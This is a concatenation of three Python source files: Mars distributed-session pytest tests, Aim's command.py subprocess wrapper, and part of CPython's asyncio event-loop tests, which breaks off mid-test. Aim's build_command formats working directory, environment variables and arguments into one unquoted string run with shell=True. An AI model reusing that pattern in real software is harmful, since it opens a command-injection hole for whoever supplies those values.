from .... import remote as mr
from ....config import option_context
from ....core.context import get_context
from ....lib.aio import new_isolation
from ....storage import StorageLevel
from ....services.storage import StorageAPI
from ....tensor.arithmetic.add import TensorAdd
from ....tests.core import check_dict_structure_same
from ..local import new_cluster
from ..service import load_config
from ..session import (
get_default_async_session,
get_default_session,
new_session,
execute,
fetch,
fetch_infos,
stop_server,
AsyncSession,
_IsolatedWebSession,
)
from .modules.utils import ( # noqa: F401; pylint: disable=unused-variable
cleanup_third_party_modules_output,
get_output_filenames,
)
CONFIG_TEST_FILE = os.path.join(os.path.dirname(__file__), "local_test_config.yml")
CONFIG_VINEYARD_TEST_FILE = os.path.join(
os.path.dirname(__file__), "local_test_with_vineyard_config.yml"
)
CONFIG_THIRD_PARTY_MODULES_TEST_FILE = os.path.join(
os.path.dirname(__file__), "local_test_with_third_parity_modules_config.yml"
)
EXPECT_PROFILING_STRUCTURE = {
"supervisor": {
"general": {
"optimize": 0.0005879402160644531,
"incref_fetch_tileables": 0.0010840892791748047,
"stage_*": {
"tile": 0.008243083953857422,
"gen_subtask_graph": 0.012202978134155273,
"run": 0.27870702743530273,
"total": 0.30318617820739746,
},
"total": 0.30951380729675293,
},
"serialization": {},
}
}
params = ["default"]
if vineyard is not None:
params.append("vineyard")
@pytest.mark.parametrize(indirect=True)
@pytest.fixture(params=params)
async def create_cluster(request):
if request.param == "default":
config = CONFIG_TEST_FILE
elif request.param == "vineyard":
config = CONFIG_VINEYARD_TEST_FILE
start_method = os.environ.get("POOL_START_METHOD", None)
client = await new_cluster(
subprocess_start_method=start_method,
config=config,
n_worker=2,
n_cpu=2,
use_uvloop=False,
)
async with client:
if request.param == "default":
assert client.session.client is not None
yield client, request.param
def _assert_storage_cleaned(session_id: str, addr: str, level: StorageLevel):
async def _assert(session_id: str, addr: str, level: StorageLevel):
storage_api = await StorageAPI.create(session_id, addr)
assert len(await storage_api.list(level)) == 0
info = await storage_api.get_storage_level_info(level)
assert info.used_size == 0
isolation = new_isolation()
asyncio.run_coroutine_threadsafe(
_assert(session_id, addr, level), isolation.loop
).result()
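# Hedged generalization of the pattern above (illustration only): synchronous
# helpers in these tests submit coroutines to the dedicated isolation loop and
# block on the returned concurrent future.
def _run_on_isolation_loop(coro):
    isolation = new_isolation()
    return asyncio.run_coroutine_threadsafe(coro, isolation.loop).result()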
@pytest.mark.asyncio
async def test_vineyard_operators(create_cluster):
param = create_cluster[1]
if param != "vineyard":
pytest.skip("Vineyard is not enabled")
session = get_default_async_session()
# tensor
raw = np.random.RandomState(0).rand(55, 55)
a = mt.tensor(raw, chunk_size=15)
info = await session.execute(a) # n.b.: pre-execute
await info
b = mt.to_vineyard(a)
info = await session.execute(b)
await info
object_id = (await session.fetch(b))[0]
c = mt.from_vineyard(object_id)
info = await session.execute(c)
await info
tensor = await session.fetch(c)
np.testing.assert_allclose(tensor, raw)
# dataframe
raw = pd.DataFrame({"a": np.arange(0, 55), "b": np.arange(55, 110)})
a = md.DataFrame(raw, chunk_size=15)
b = a.to_vineyard() # n.b.: no pre-execute
info = await session.execute(b)
await info
object_id = (await session.fetch(b))[0][0]
c = md.from_vineyard(object_id)
info = await session.execute(c)
await info
df = await session.fetch(c)
pd.testing.assert_frame_equal(df, raw)
@pytest.mark.parametrize(
"config",
[
[{"enable_profiling": True}, EXPECT_PROFILING_STRUCTURE],
[{}, {}],
],
)
@pytest.mark.asyncio
async def test_execute(create_cluster, config):
session = get_default_async_session()
assert session.address is not None
assert session.session_id is not None
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
extra_config, expect_profiling_structure = config
info = await session.execute(b, extra_config=extra_config)
await info
if extra_config:
check_dict_structure_same(info.profiling_result(), expect_profiling_structure)
else:
assert not info.profiling_result()
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
with pytest.raises(ValueError):
await session.fetch(b + 1)
with pytest.raises(ValueError):
await session.fetch(b[b < 0.6])
del a, b
@pytest.mark.asyncio
async def test_iterative_tiling(create_cluster):
session = get_default_async_session()
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df = df[df[0] < 0.7]
df2 = df.shift(2)
info = await session.execute(df2)
await info
assert info.result() is None
result = await session.fetch(df2)
expected = raw_df[raw_df[0] < 0.7].shift(2)
pd.testing.assert_frame_equal(result, expected)
# test meta
assert df2.index_value.min_val >= 1
assert df2.index_value.max_val <= 30
@pytest.mark.asyncio
async def test_execute_describe(create_cluster):
s = np.random.RandomState(0)
raw = pd.DataFrame(s.rand(100, 4), columns=list("abcd"))
df = md.DataFrame(raw, chunk_size=30)
session = get_default_async_session()
r = df.describe()
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
res = await session.fetch(r)
pd.testing.assert_frame_equal(res, raw.describe())
@pytest.mark.asyncio
async def test_sync_execute_in_async(create_cluster):
a = mt.ones((10, 10))
b = a + 1
res = b.to_numpy()
np.testing.assert_array_equal(res, np.ones((10, 10)) + 1)
@pytest.mark.asyncio
async def test_fetch_infos(create_cluster):
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df.execute()
fetched_infos = df.fetch_infos()
assert "object_id" in fetched_infos
assert "level" in fetched_infos
assert "memory_size" in fetched_infos
assert "store_size" in fetched_infos
assert "band" in fetched_infos
fetch_infos((df, df), fields=None)
results_infos = mr.ExecutableTuple([df, df]).execute()._fetch_infos()
assert len(results_infos) == 2
assert "object_id" in results_infos[0]
assert "level" in results_infos[0]
assert "memory_size" in results_infos[0]
assert "store_size" in results_infos[0]
assert "band" in results_infos[0]
async def _run_web_session_test(web_address):
session_id = str(uuid.uuid4())
session = await AsyncSession.init(web_address, session_id)
session.as_default()
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
del a, b
# Test spawn a local function by the web session.
def _my_func():
print("output from function")
r = mr.spawn(_my_func)
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
assert "output from function" in str(r.fetch_log(session=session))
assert "output from function" in str(
r.fetch_log(session=session, offsets="0k", sizes=[1000])
)
assert "output from function" in str(
r.fetch_log(session=session, offsets={r.op.key: "0k"}, sizes=[1000])
)
df = md.DataFrame([1, 2, 3])
# Test applying a lambda through the web session.
r = df.apply(lambda x: x)
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
pd.testing.assert_frame_equal(await session.fetch(r), pd.DataFrame([1, 2, 3]))
AsyncSession.reset_default()
await session.destroy()
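# test_web_session runs the async test bodies above against the cluster's web
# endpoint, then repeats the standalone helper with a freshly generated
# session id on the same address.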
@pytest.mark.parametrize(
"config",
[
[{"enable_profiling": True}, EXPECT_PROFILING_STRUCTURE],
[{}, {}],
],
)
@pytest.mark.asyncio
async def test_web_session(create_cluster, config):
client = create_cluster[0]
session_id = str(uuid.uuid4())
web_address = client.web_address
session = await AsyncSession.init(
web_address, session_id, request_rewriter=lambda x: x
)
assert await session.get_web_endpoint() == web_address
session.as_default()
assert isinstance(session._isolated_session, _IsolatedWebSession)
await test_execute(client, config)
await test_iterative_tiling(client)
AsyncSession.reset_default()
await session.destroy()
await _run_web_session_test(web_address)
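# Synchronous API smoke test: a local session without the web UI, chained
# execute()/fetch() calls, CSV round-trips via md.read_csv, and a check that
# memory storage on every worker was cleaned up before stopping the server.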
def test_sync_execute():
session = new_session(n_cpu=2, web=False, use_uvloop=False)
# web not started
assert session._session.client.web_address is None
assert session.get_web_endpoint() is None
with session:
raw = np.random.RandomState(0).rand(10, 5)
a = mt.tensor(raw, chunk_size=5).sum(axis=1)
b = a.execute(show_progress=False)
assert b is a
result = a.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1))
c = b + 1
c.execute(show_progress=False)
result = c.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1) + 1)
c = mt.tensor(raw, chunk_size=5).sum()
d = session.execute(c)
assert d is c
assert abs(session.fetch(d) - raw.sum()) < 0.001
with tempfile.TemporaryDirectory() as tempdir:
file_path = os.path.join(tempdir, "test.csv")
pdf = pd.DataFrame(
np.random.RandomState(0).rand(100, 10),
columns=[f"col{i}" for i in range(10)],
)
pdf.to_csv(file_path, index=False)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.sum(axis=1).execute().fetch()
expected = pd.read_csv(file_path).sum(axis=1)
pd.testing.assert_series_equal(result, expected)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.head(10).execute().fetch()
expected = pd.read_csv(file_path).head(10)
pd.testing.assert_frame_equal(result, expected)
for worker_pool in session._session.client._cluster._worker_pools:
_assert_storage_cleaned(
session.session_id, worker_pool.external_address, StorageLevel.MEMORY
)
session.stop_server()
assert get_default_async_session() is None
def test_no_default_session():
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
with pytest.warns(Warning):
execute(b, show_progress=False)
np.testing.assert_array_equal(fetch(b), raw + 1)
fetch_infos(b, fields=None)
assert get_default_async_session() is not None
stop_server()
assert get_default_async_session() is None
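# Progress reporting: the spawned function calls get_context().set_progress()
# as it runs, and the test polls info.progress() until it observes a value
# strictly between 0 and 1 before finally awaiting completion.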
@pytest.mark.asyncio
async def test_session_progress(create_cluster):
session = get_default_async_session()
assert session.address is not None
assert session.session_id is not None
def f1(interval: float, count: int):
for idx in range(count):
time.sleep(interval)
get_context().set_progress((1 + idx) * 1.0 / count)
r = mr.spawn(f1, args=(0.5, 10))
info = await session.execute(r)
for _ in range(20):
if 0 < info.progress() < 1:
break
await asyncio.sleep(0.1)
else:
raise Exception(f"progress test failed, actual value {info.progress()}.")
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
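# Fixture for the decref/cancel tests below: a local session with the web
# endpoint enabled and progress bars turned off for the duration of each test.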
@pytest.fixture
def setup_session():
session = new_session(n_cpu=2, use_uvloop=False)
assert session.get_web_endpoint() is not None
with session:
with option_context({"show_progress": False}):
yield session
session.stop_server()
def test_decref(setup_session):
session = setup_session
a = mt.ones((10, 10))
b = mt.ones((10, 10))
c = b + 1
d = mt.ones((5, 5))
a.execute()
b.execute()
c.execute()
d.execute()
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del b
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del c
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 1
del d
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
rs = np.random.RandomState(0)
pdf = pd.DataFrame({"a": rs.randint(10, size=10), "b": rs.rand(10)})
df = md.DataFrame(pdf, chunk_size=5)
df2 = df.groupby("a").agg("mean", method="shuffle")
result = df2.execute().fetch()
expected = pdf.groupby("a").agg("mean")
pd.testing.assert_frame_equal(result, expected)
del df, df2
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
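# Cancellation helpers: each submits work that would otherwise run for a long
# time, cancels it through the shared event, and verifies nothing is left
# behind (executed sessions, reference counts and, for the execute case,
# worker storage).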
def _cancel_when_execute(session, cancelled):
def run():
time.sleep(200)
rs = [mr.spawn(run) for _ in range(10)]
execute(*rs, cancelled=cancelled)
assert all(not r._executed_sessions for r in rs)
del rs
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
class SlowTileAdd(TensorAdd):
@classmethod
def tile(cls, op):
time.sleep(2)
return (yield from TensorAdd.tile(op))
def _cancel_when_tile(session, cancelled):
a = mt.tensor([1, 2, 3])
for i in range(20):
a = SlowTileAdd(dtype=np.dtype(np.int64))(a, 1)
execute(a, cancelled=cancelled)
assert not a._executed_sessions
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
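# test_cancel sets the cancellation event from a background thread after 0.5s,
# expects the blocked execute() call to return well within 20s, and then
# submits another task to prove the session is still usable.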
@pytest.mark.parametrize("test_func", [_cancel_when_execute, _cancel_when_tile])
def test_cancel(setup_session, test_func):
session = setup_session
async def _new_cancel_event():
return asyncio.Event()
isolation = new_isolation()
cancelled = asyncio.run_coroutine_threadsafe(
_new_cancel_event(), isolation.loop
).result()
def cancel():
time.sleep(0.5)
cancelled.set()
t = threading.Thread(target=cancel)
t.daemon = True
t.start()
start = time.time()
test_func(session, cancelled)
assert time.time() - start < 20
# submit another task
raw = np.random.rand(10, 10)
t = mt.tensor(raw, chunk_size=(10, 5))
np.testing.assert_array_equal(t.execute().fetch(), raw)
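# Third-party module loading: malformed configurations must fail fast with
# TypeError/ModuleNotFoundError, while a valid module (replace_op, which swaps
# the add for a subtract) must take effect on workers, hence the raw - 1
# assertion below. The file-based config is expected to start one main pool
# plus 3 sub pools (2 workers + 1 IO).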
def test_load_third_party_modules(cleanup_third_party_modules_output): # noqa: F811
config = load_config()
config["third_party_modules"] = set()
with pytest.raises(TypeError, match="set"):
new_session(n_cpu=2, web=False, config=config)
config["third_party_modules"] = {"supervisor": ["not_exists_for_supervisor"]}
with pytest.raises(ModuleNotFoundError, match="not_exists_for_supervisor"):
new_session(n_cpu=2, web=False, config=config)
config["third_party_modules"] = {"worker": ["not_exists_for_worker"]}
with pytest.raises(ModuleNotFoundError, match="not_exists_for_worker"):
new_session(n_cpu=2, web=False, config=config)
config["third_party_modules"] = ["mars.deploy.oscar.tests.modules.replace_op"]
session = new_session(n_cpu=2, web=False, config=config)
# web not started
assert session._session.client.web_address is None
with session:
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
b.execute(show_progress=False)
result = b.fetch()
np.testing.assert_equal(raw - 1, result)
session.stop_server()
assert get_default_session() is None
session = new_session(
n_cpu=2, web=False, config=CONFIG_THIRD_PARTY_MODULES_TEST_FILE
)
# web not started
assert session._session.client.web_address is None
with session:
# 1 main pool, 3 sub pools (2 workers + 1 IO).
assert len(get_output_filenames()) == 4
session.stop_server()
assert get_default_session() is None
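# A minimal, self-contained sketch of the synchronous session lifecycle the
# tests above exercise (it reuses the module-level imports already used in
# this file: new_session and mt). The __main__ guard keeps it from running
# during test collection.
if __name__ == "__main__":
    demo_session = new_session(n_cpu=2, web=False, use_uvloop=False)
    with demo_session:
        # Build a deferred expression, execute it on the cluster, fetch the value.
        t = (mt.ones((4, 4)) * 2).sum()
        assert float(t.execute().fetch()) == 32.0
    demo_session.stop_server()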
|
command.py
|
import os
import psutil
import signal
import subprocess
import threading
from time import sleep
from aim.engine.configs import *
from aim.engine.repo import AimRepo
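# Command wraps a single script invocation for the Aim executor: it parses the
# Aim-specific environment variables, builds a shell command string, and runs
# it in a daemon thread so that start() can hand back the child PID while
# stdout/stderr are collected in the background.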
class Command:
def __init__(self, data):
self.name = data.get('name')
self.script_path = data.get('script_path')
self.arguments = data.get('arguments')
self.interpreter_path = data.get('interpreter_path')
self.working_dir = data.get('working_dir')
self.process_uuid = data.get('process_uuid')
# Parse env vars
parsed_vars = self._parse_env_vars(data.get('env_vars'))
self.automated_info = parsed_vars
self.env_vars = parsed_vars['env_vars']
self.command = self.build_command()
self.process = None
self.pid = None
self.stdout = None
self.stderr = None
self.alive = True
self._thread = threading.Thread(target=self._exec, daemon=True)
def start(self):
self._thread.start()
while True:
if self.pid:
return self.pid
else:
sleep(0.01)
def kill(self):
try:
current_process = psutil.Process(self.pid)
children = current_process.children(recursive=True)
for child in children:
os.kill(child.pid, signal.SIGINT)
os.kill(self.pid, signal.SIGINT)
self._thread.join()
except Exception:
# The target process may have already exited; ignore errors during cleanup.
pass
self.alive = False
def build_command(self):
script_path = self.script_path
arguments = self.arguments or ''
interpreter_path = self.interpreter_path or 'python'
env_vars = self.env_vars
work_dir = ''
if self.working_dir:
work_dir = 'cd {} && '.format(self.working_dir)
command = ('{work_dir} {env_vars} {interpt} ' +
'{script_path} {arguments}').format(work_dir=work_dir,
env_vars=env_vars,
interpt=interpreter_path,
script_path=script_path,
arguments=arguments)
return command
def _parse_env_vars(self, env_vars):
env_vars = env_vars or ''
env_vars_arr = env_vars.split(' ')
filtered_env_vars = []
automated = False
automated_branch = None
automated_commit = None
for e in env_vars_arr:
if AIM_AUTOMATED_EXEC_ENV_VAR in e:
automated = True
elif AIM_BRANCH_ENV_VAR in e:
_, _, automated_branch = e.rpartition('=')
else:
filtered_env_vars.append(e)
if automated:
if not automated_branch:
automated_branch = AIM_DEFAULT_BRANCH_NAME
automated_commit = AimRepo.generate_commit_hash()
filtered_env_vars.append('{}={}'.format(AIM_BRANCH_ENV_VAR,
automated_branch))
filtered_env_vars.append('{}={}'.format(AIM_COMMIT_ENV_VAR,
automated_commit))
filtered_env_vars.append('{}={}'.format(AIM_PROCESS_ENV_VAR,
self.process_uuid))
filtered_env_vars.append('{}=1'.format(AIM_AUTOMATED_EXEC_ENV_VAR))
return {
'env_vars': ' '.join(filtered_env_vars),
'automated': automated,
'automated_branch': automated_branch,
'automated_commit': automated_commit,
}
def _exec(self):
self.process = subprocess.Popen(self.command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
# preexec_fn=self.preexec
)
self.pid = self.process.pid
self.stdout, self.stderr = self.process.communicate()
self.alive = False
# def preexec(self):
# # Don't forward signals.
# import os
# os.setpgrp()
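# A minimal usage sketch. The dict keys mirror the .get() calls in __init__;
# the concrete values here are hypothetical. Constructing a Command only
# builds the shell command string -- nothing is spawned until start() is called.
if __name__ == '__main__':
    demo = Command({
        'name': 'demo',
        'script_path': 'train.py',
        'arguments': '--epochs 1',
        'interpreter_path': 'python',
        'working_dir': '.',
        'process_uuid': 'demo-process-uuid',
        'env_vars': '',
    })
    print(demo.command)  # inspect the command line without executing it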
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
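# The protocol classes below are small state machines (INITIAL -> CONNECTED ->
# EOF -> CLOSED) that count received bytes; tests assert on .state/.nbytes and
# wait on the .connected/.done futures they expose.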
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
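# EventLoopTestsMixin contains the loop-agnostic test bodies; concrete test
# classes are expected to mix it in and provide create_event_loop() for a
# specific event loop implementation.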
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
